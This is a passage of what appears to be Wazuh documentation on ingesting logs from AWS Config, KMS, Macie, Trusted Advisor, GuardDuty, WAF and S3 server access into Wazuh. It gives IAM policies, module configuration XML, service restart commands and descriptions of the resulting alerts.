If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Config logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="config">
        <name><WAZUH_AWS_BUCKET></name>
        <path>config</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use cases

AWS Config allows you to review changes in configuration and relationships between AWS resources. Below is an example of a use case for AWS Config.

Monitoring configuration changes

Multiple alerts with rule ID 80454 will be seen on the Wazuh dashboard when there are changes in the configuration of the resources monitored by AWS Config. Some examples are shown in the image below.

You can expand an alert to see more information such as the resource name, resource type, and configuration state.

AWS Key Management Service (KMS)

AWS Key Management Service (KMS) makes it easy for users to create and manage keys and control the use of encryption across a wide range of AWS services and in their applications. AWS KMS is a secure and resilient service that uses FIPS 140-2 validated hardware security modules to protect their keys. AWS KMS is integrated with AWS CloudTrail to provide users with logs of all key usage to help meet their regulatory and compliance needs.

AWS configuration

The following sections cover how to configure the different services required to integrate the AWS KMS service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the AWS KMS events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. (If you want to use an already created one, skip this step).

  2. On your AWS console, search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a YYYY/MM/DD/HH file structure; if a prefix is used, the resulting structure is prefix-name/YYYY/MM/DD/HH and the prefix must be specified in the Wazuh bucket configuration. In our case, the prefix is kms_compress_encrypted/. Select your preferred compression; Wazuh supports any compression type except Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send KMS events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or go to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Assign a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Key Management Service (KMS) as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, data will start to be sent to the previously created S3 bucket. Remember to first enable the service you want to monitor, otherwise, you won't get any data.
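
For reference, selecting Key Management Service (KMS) and All Events in step 5 should build an event pattern equivalent to the following; the console generates it for you:

{
  "source": ["aws.kms"]
}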

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon KMS logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>kms_compress_encrypted</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

AWS Key Management Service allows you to create and control cryptographic keys for securing your data. Monitoring this service with Wazuh allows you to understand the availability, state, and usage of your AWS KMS keys in AWS KMS.

Below is a use case for Wazuh alerts built for AWS KMS.

Monitoring KMS key usage

When KMS key usage events such as CreateKey, ScheduleKeyDeletion, DisableKeyDeletion, and CreateAlias occur, the following alerts with rule ID 80491 will be displayed on the Wazuh dashboard.

You can expand the alert to see more information such as the key policy, encryption type, and other details about the affected key.

Amazon Macie

Amazon Macie is a security service that uses machine learning to automatically discover, classify, and protect sensitive data in AWS. Macie recognizes sensitive data such as personally identifiable information (PII) or intellectual property and provides you with dashboards and alerts that give visibility into how this data is being accessed or moved. The fully managed service continuously monitors data access activity for anomalies and generates detailed alerts when it detects the risk of unauthorized access or inadvertent data leaks.

AWS configuration

The following sections cover how to configure the different services required to integrate the Amazon Macie service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Amazon Macie events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. (If you want to use an already created one, skip this step).

  2. On your AWS console, search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a YYYY/MM/DD/HH file structure; if a prefix is used, the resulting structure is prefix-name/YYYY/MM/DD/HH and the prefix must be specified in the Wazuh bucket configuration. In our case, the prefix is macie/.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Macie events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or navigate to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Assign a name to the rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Macie as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time a Macie event is sent, it will be stored in the specified S3 bucket. Remember to first enable the Macie service, otherwise, you won't get any data.
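
For reference, choosing Macie and All Events in step 5 should build an event pattern equivalent to the following; the console generates it for you:

{
  "source": ["aws.macie"]
}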

Amazon Macie configuration
  1. On your AWS console, search for "Amazon Macie" in the search bar and click Amazon Macie from the results.

  2. If this is the first time you are setting up the service, you will see this interface. Click Get started to proceed.

  3. Click Enable Macie to enable the service.

Once enabled, Macie provides visibility into data security risks and enables automated protection against those risks. Check the official AWS documentation to learn more about the service.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Macie logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>macie</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    Check the Wazuh module for AWS reference manual to learn more about each setting.

  3. Restart Wazuh in order to apply the changes:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon S3 (Simple Storage Service) provides secure and reliable storage capacity in the cloud. When using this service, it is highly recommended to monitor it to detect misconfigurations and sensitive data leakage.

Below is a use case for Wazuh alerts built for S3.

Sensitive data disclosure in S3 bucket

When sensitive data such as financial information, credentials, and personal information are found in an S3 bucket, the following alerts with rule ID 80352 and 80354 will be displayed on the Wazuh dashboard.

You can expand the alert to see more information such as the description of the alert, and details about the affected S3 bucket.

AWS Trusted Advisor

AWS Trusted Advisor helps users optimize their AWS environment by following AWS best practices to provide real-time guidance that aims to reduce cost, increase performance, and improve security. Trusted Advisor logs can be stored in an S3 bucket thanks to Amazon EventBridge and Amazon Data Firehose, allowing Wazuh to process them and generate alerts using the built-in rules Wazuh provides, as well as any custom rules available.

Note

You must have a Business, Enterprise On-Ramp, or Enterprise AWS Support plan to create an EventBridge rule for Trusted Advisor checks. For more information, see changing AWS support plans.

AWS configuration

The following sections cover how to configure the different services required to integrate Trusted Advisor into Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Trusted Advisor logs into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a YYYY/MM/DD/HH file structure; if a prefix is used, the resulting structure is prefix-name/YYYY/MM/DD/HH and the prefix must be specified in the Wazuh bucket configuration. In our case, the prefix is trusted-advisor/. Select your preferred compression; Wazuh supports any compression type except Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new firehose stream will be created and its details will be shown as follows.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Trusted Advisor events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or navigate to Services > Application Integration > EventBridge.

  2. Click Create rule.

  3. Give a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section, choose AWS services as Event source, Trusted Advisor as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time a Trusted Advisor event is sent, it will be stored in the specified S3 bucket. Remember to first enable the Trusted Advisor service, otherwise, you won't get any data.
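
For reference, choosing Trusted Advisor and All Events in step 5 should build an event pattern similar to the following; the console generates it for you:

{
  "source": ["aws.trustedadvisor"]
}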

AWS Trusted Advisor configuration
  1. On your AWS console, search for "Trusted Advisor" in the search bar at the top of the page or navigate to Services > Management & Governance > Trusted Advisor.

  2. Go to Manage Trusted Advisor in the left menu and click on the Enabled button.

Once enabled, Trusted Advisor reviews the different checks for the AWS account. Check the official AWS documentation to learn more about the different Trusted Advisor checks available.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Trusted Advisor logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="custom">
        <name><WAZUH_AWS_BUCKET></name>
        <path>trusted-advisor</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon GuardDuty

Amazon GuardDuty is a threat detection service that continuously monitors for malicious or unauthorized behavior to help you protect your AWS accounts and workloads. It monitors for activity such as unusual API calls or potentially unauthorized deployments that indicate a possible account compromise. GuardDuty also detects potentially compromised instances or reconnaissance by attackers.

AWS configuration

The following sections cover how to configure the different services required to integrate GuardDuty with Wazuh.

Amazon GuardDuty configuration
  1. Create a new S3 bucket. If you want to use an existing bucket, skip this step.

  2. On your AWS console, search for "guardduty" in the search bar at the top of the page or navigate to Services > Security, Identity, & Compliance > GuardDuty.

  3. S3 Protection enables Amazon GuardDuty to monitor object-level API operations to identify potential security risks for data within your S3 buckets. In the navigation pane, under Protection plans, click S3 Protection and enable S3 protection.

  4. Confirm your selection.

  5. In the navigation pane, go to Settings, scroll to Findings export options, and click Configure now to configure GuardDuty to export findings to an S3 bucket.

  6. See the configuring an S3 bucket and creating symmetric encryption KMS keys guides on how to create an S3 bucket and KMS key. Copy and paste the appropriate values into the S3 bucket ARN and KMS key ARN fields.

  7. In the Attach policy section, click on View Policy for S3 bucket and View Policy for KMS key. Copy and attach the corresponding policy to the selected S3 bucket and the KMS key. Click Save to apply the configuration.

    Note

    For more information on how to change the S3 and KMS policies, see the adding a bucket policy by using the Amazon S3 console and changing a key policy guides.

  8. In the Findings export options section, you can also set the frequency for updating the S3 bucket with the GuardDuty findings. In our case, the frequency is set to 15 minutes.
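
Before configuring Wazuh, you can optionally confirm that findings are reaching the bucket. The command below is a minimal check using the AWS CLI; the exact object prefix depends on your export configuration:

# List exported GuardDuty findings in the destination bucket
aws s3 ls "s3://<WAZUH_AWS_BUCKET>/" --recursive | head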

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon GuardDuty logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="guardduty">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
GuardDuty use cases

Amazon EC2 (Elastic Compute Cloud) provides scalable computing capacity in the cloud. When using this service, it is highly recommended to monitor it for intrusion attempts or other unauthorized actions performed against your cloud infrastructure.

Below are some use cases for Wazuh rules built for EC2.

Brute force attacks

If an instance has an open port that is receiving a brute force attack, the following alerts with rule ID 80301 will be shown on the Wazuh dashboard.

These alerts show information about the attacked host, the attacker, and which port is being attacked.

EC2 API calls made from an unusual network

If an API call is made from an unusual network, the following alerts with rule IDs 80301, 80302, and 80303 will be shown on the Wazuh dashboard.

These alerts show the location of the unusual network, the user who made the API calls, and which API calls were made.

Compromised EC2 instance

If there is any indicator of a compromised EC2 instance, an alert with rule ID 80303 will be shown on the Wazuh dashboard explaining what's happening. Some examples of alerts are shown below.

To sum up, the following screenshot shows some alerts generated for a compromised EC2 instance.

Amazon Web Application Firewall (WAF)

Amazon WAF is a web application firewall that helps protect your web applications from common web exploits that could affect application availability, compromise security, or consume excessive resources. AWS WAF gives you control over which traffic to allow or block to your web applications by defining customizable web security rules.

AWS configuration

The following sections cover how to configure different services required to integrate AWS WAF with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the Amazon WAF logs into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, Search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Under Firehose stream name, give the data firehose a name that starts with the prefix aws-waf-logs-.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a file structure YYYY/MM/DD/HH, if a prefix is used the created file structure would be prefix-name/YYYY/MM/DD/HH. If a prefix is used it must be specified under the Wazuh bucket configuration. In our case, the prefix is waf/.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.
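
Optionally, you can confirm from the AWS CLI that the delivery stream exists and is active. This is a minimal check; the stream name is an example, so replace it with the name chosen in step 5:

# Describe the Firehose stream created for WAF logs (name is an example)
aws firehose describe-delivery-stream --delivery-stream-name aws-waf-logs-example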

AWS WAF configuration

Send logs from your Web Access Control Lists (web ACLs) to the previously created Amazon Data Firehose with a configured S3 storage destination. After you enable logging, AWS WAF delivers logs to your S3 bucket through the HTTPS endpoint of Firehose.

  1. On the AWS console, search for "waf" or go to Services > Security, Identity, & Compliance > WAF & Shield.

  2. Click Go to AWS WAF.

  3. Go to Web ACLs and click the name of the Web ACL attached to your web application. If you have not configured the Web ACL, follow the set up AWS WAF guide.

  4. Go to Logging and metrics, under Logging, click Enable.

  5. Select Amazon Data Firehose stream as Logging destination, and select the previously created firehose stream under Amazon Data Firehose stream.

  6. Under Filter logs, apply your preferred filtering requirements and click Save. In our case, we set up the filter to log blocked web requests only.

  7. Confirm that logging is enabled.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon WAF logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="waf">
        <name><WAZUH_AWS_BUCKET></name>
        <path>waf</path>                   <!-- PUT THE S3 BUCKET PREFIX IF THE LOGS ARE NOT STORED IN THE BUCKET'S ROOT PATH -->
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
HTTP Request headers

The Wazuh AWS WAF implementation parses the header information present in the httpRequest field, allowing filtering by these headers and their values on the Wazuh dashboard. During this parsing, any non-standard header will be extracted and removed from the event before sending it to analysisd. Here is the complete list of the allowed standard header fields:

a-im
accept
accept-charset
accept-encoding
accept-language
access-control-request-method
access-control-request-headers
authorization
cache-control
connection
content-encoding
content-length
content-type
cookie
date
expect
forwarded
from
host
http2-settings
if-match
if-modified-since
if-none-match
if-range
if-unmodified-since
max-forwards
origin
pragma
prefer
proxy-authorization
range
referer
te
trailer
transfer-encoding
user-agent
upgrade
via
warning
x-requested-with
x-forwarded-for
x-forwarded-host
x-forwarded-proto
Use case

AWS WAF is a security service that helps protect your web applications or APIs from threats. By monitoring blocked requests, you can identify the types of threats your application is facing. This can help you understand the security landscape and adjust your defenses accordingly.

Monitoring blocked web application requests

If web requests are blocked by the rules of the Amazon Web ACL, the following alerts with rule IDs 80442 and 80443 will be shown on the Wazuh dashboard.

Expand an alert to find more information such as the Request-URI, the method, and the Web ACL rule label that blocked the request.

Amazon S3 Server Access

Amazon S3 server access logging provides detailed records for the requests that are made to a bucket. Server access logs are useful for many applications. For example, access log information can be useful in security and access audits. It can also help you learn about your customer base and understand your Amazon S3 bill.

AWS configuration

The following sections cover how to configure the Amazon S3 Server Access service to integrate with Wazuh.

Amazon S3 server access configuration
  1. Create a new S3 bucket to store the access logs in it. If you want to use an existing one, skip this step.

  2. On your AWS console search for "S3" or go to Services > Storage > S3.

  3. Look for the S3 bucket you want to monitor and click on its name.

  4. Go to the Properties tab, scroll down until you find the Server access logging, and click Edit.

  5. Check the Enable option, and click Browse S3 to look for the bucket in which you want S3 Server Access logs to be stored. In our case, the logs are stored in the s3-server-logs/ path of the monitored S3 bucket.

    Note

    It is possible to store the S3 Server Access logs in the same bucket being monitored. It is also possible to specify a custom path inside the bucket to store the logs.

  6. Finally, click Save changes. S3 Server Access logs will start to be stored in the specified path. You can verify delivery with the AWS CLI, as shown below.
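
The following command is a minimal check, assuming the logs are delivered to the s3-server-logs/ path used in this example. Note that S3 server access log delivery is best effort, so objects can take a while to appear:

# List delivered server access logs under the chosen path
aws s3 ls "s3://<WAZUH_AWS_BUCKET>/s3-server-logs/" --recursive | head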

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon S3 Server Access logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
